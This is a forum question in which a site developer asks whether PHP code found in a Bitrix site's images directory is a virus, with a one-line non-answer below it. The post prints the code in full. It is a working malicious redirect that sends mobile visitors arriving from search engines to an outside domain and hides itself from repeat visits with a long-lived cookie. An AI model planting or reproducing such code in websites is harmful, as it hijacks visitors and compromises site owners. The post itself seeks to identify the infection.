J
J
Jupiter Max2018-10-03 06:00:38
Malware
Jupiter Max, 2018-10-03 06:00:38

Does it look like a virus in Bitrix?

Hello.
It is necessary to make improvements on the site, Bitrix. I uploaded it to my server, after checking it showed this code as a virus. Lies in the directory bitrix/images/main

<?if(isset($_SERVER['HTTP_REFERER']) AND !isset($_COOKIE["SESSION_ID27"]))
{setcookie("SESSION_ID27", "1", time()+315360000, "/");
$urls = array("google.", "yandex.", "yahoo.", "aol.", "msn.", "rambler.", "mail.", "ya.", "bing.", "qip.");
for ($i=0; $i < count($urls); $i++)	
if (strpos($_SERVER['HTTP_REFERER'],$urls[$i])!==false){
  if(is_mobile())
    exit('<script>window.top.location.href = "http://ltell.ru/";</script>');
  }
  
}




function is_mobile(){
  $user_agent=strtolower(getenv('HTTP_USER_AGENT')); 
  $accept=strtolower(getenv('HTTP_ACCEPT')); 
 
  if ((strpos($accept,'text/vnd.wap.wml')!==false) || 
      (strpos($accept,'application/vnd.wap.xhtml+xml')!==false)) { 
    return 1;
  } 
 
  if (isset($_SERVER['HTTP_X_WAP_PROFILE']) || 
      isset($_SERVER['HTTP_PROFILE'])) { 
    return 2;
  } 
 
  if (preg_match('/(mini 9.5|vx1000|lge |m800|e860|u940|ux840|compal|'. 
    'wireless| mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|'. 
    'lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|'. 
    'mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|'. 
    'm881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|'. 
    'r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|'. 
    'i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|'. 
    'htil-g1|fly v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|'. 
    'sanyo|vx54|c888|nx250|n120|mtk |c5588|s710|t880|c5005|i;458x|'. 
    'p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|'. 
    '_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|'. 
    's800|8325rc|ac831|mw200|brew |d88|htc\/|htc_touch|355x|m50|km100|'. 
    'd736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg |'. 
    'sonyericsson|samsung|240x|x320vx10|nokia|sony cmd|motorola|'. 
    'up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|'. 
    'pocket|kindle|mobile|psp|treo|android|iphone|ipod|webos|wp7|wp8|'. 
    'fennec|blackberry|htc_|opera m|windowsphone)/', $user_agent)) { 
    return 3;
  } 
 
  if (in_array(substr($user_agent,0,4), 
    Array("1207", "3gso", "4thp", "501i", "502i", "503i", "504i", "505i", "506i", 
          "6310", "6590", "770s", "802s", "a wa", "abac", "acer", "acoo", "acs-", 
          "aiko", "airn", "alav", "alca", "alco", "amoi", "anex", "anny", "anyw", 
          "aptu", "arch", "argo", "aste", "asus", "attw", "au-m", "audi", "aur ", 
          "aus ", "avan", "beck", "bell", "benq", "bilb", "bird", "blac", "blaz", 
          "brew", "brvw", "bumb", "bw-n", "bw-u", "c55/", "capi", "ccwa", "cdm-", 
          "cell", "chtm", "cldc", "cmd-", "cond", "craw", "dait", "dall", "dang", 
          "dbte", "dc-s", "devi", "dica", "dmob", "doco", "dopo", "ds-d", "ds12", 
          "el49", "elai", "eml2", "emul", "eric", "erk0", "esl8", "ez40", "ez60", 
          "ez70", "ezos", "ezwa", "ezze", "fake", "fetc", "fly-", "fly_", "g-mo", 
          "g1 u", "g560", "gene", "gf-5", "go.w", "good", "grad", "grun", "haie", 
          "hcit", "hd-m", "hd-p", "hd-t", "hei-", "hiba", "hipt", "hita", "hp i", 
          "hpip", "hs-c", "htc ", "htc-", "htc_", "htca", "htcg", "htcp", "htcs", 
          "htct", "http", "huaw", "hutc", "i-20", "i-go", "i-ma", "i230", "iac", 
          "iac-", "iac/", "ibro", "idea", "ig01", "ikom", "im1k", "inno", "ipaq", 
          "iris", "jata", "java", "jbro", "jemu", "jigs", "kddi", "keji", "kgt", 
          "kgt/", "klon", "kpt ", "kwc-", "kyoc", "kyok", "leno", "lexi", "lg g", 
          "lg-a", "lg-b", "lg-c", "lg-d", "lg-f", "lg-g", "lg-k", "lg-l", "lg-m", 
          "lg-o", "lg-p", "lg-s", "lg-t", "lg-u", "lg-w", "lg/k", "lg/l", "lg/u", 
          "lg50", "lg54", "lge-", "lge/", "libw", "lynx", "m-cr", "m1-w", "m3ga", 
          "m50/", "mate", "maui", "maxo", "mc01", "mc21", "mcca", "medi", "merc", 
          "meri", "midp", "mio8", "mioa", "mits", "mmef", "mo01", "mo02", "mobi", 
          "mode", "modo", "mot ", "mot-", "moto", "motv", "mozz", "mt50", "mtp1", 
          "mtv ", "mwbp", "mywa", "n100", "n101", "n102", "n202", "n203", "n300", 
          "n302", "n500", "n502", "n505", "n700", "n701", "n710", "nec-", "nem-", 
          "neon", "netf", "newg", "newt", "nok6", "noki", "nzph", "o2 x", "o2-x", 
          "o2im", "opti", "opwv", "oran", "owg1", "p800", "palm", "pana", "pand", 
          "pant", "pdxg", "pg-1", "pg-2", "pg-3", "pg-6", "pg-8", "pg-c", "pg13", 
          "phil", "pire", "play", "pluc", "pn-2", "pock", "port", "pose", "prox", 
          "psio", "pt-g", "qa-a", "qc-2", "qc-3", "qc-5", "qc-7", "qc07", "qc12", 
          "qc21", "qc32", "qc60", "qci-", "qtek", "qwap", "r380", "r600", "raks", 
          "rim9", "rove", "rozo", "s55/", "sage", "sama", "samm", "sams", "sany", 
          "sava", "sc01", "sch-", "scoo", "scp-", "sdk/", "se47", "sec-", "sec0", 
          "sec1", "semc", "send", "seri", "sgh-", "shar", "sie-", "siem", "sk-0", 
          "sl45", "slid", "smal", "smar", "smb3", "smit", "smt5", "soft", "sony", 
          "sp01", "sph-", "spv ", "spv-", "sy01", "symb", "t-mo", "t218", "t250", 
          "t600", "t610", "t618", "tagt", "talk", "tcl-", "tdg-", "teli", "telm", 
          "tim-", "topl", "tosh", "treo", "ts70", "tsm-", "tsm3", "tsm5", "tx-9", 
          "up.b", "upg1", "upsi", "utst", "v400", "v750", "veri", "virg", "vite", 
          "vk-v", "vk40", "vk50", "vk52", "vk53", "vm40", "voda", "vulc", "vx52", 
          "vx53", "vx60", "vx61", "vx70", "vx80", "vx81", "vx83", "vx85", "vx98", 
          "w3c ", "w3c-", "wap-", "wapa", "wapi", "wapj", "wapm", "wapp", "wapr", 
          "waps", "wapt", "wapu", "wapv", "wapy", "webc", "whit", "wig ", "winc", 
          "winw", "wmlb", "wonu", "x700", "xda-", "xda2", "xdag", "yas-", "your", 
          "zeto", "zte-"))) { 
    return 4; 
  } 
 
  return false; 
}

?>

Answer the question

In order to leave comments, you need to log in

1 answer(s)
A
Ainur Valiev, 2018-10-03
@vaajnur

to any

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question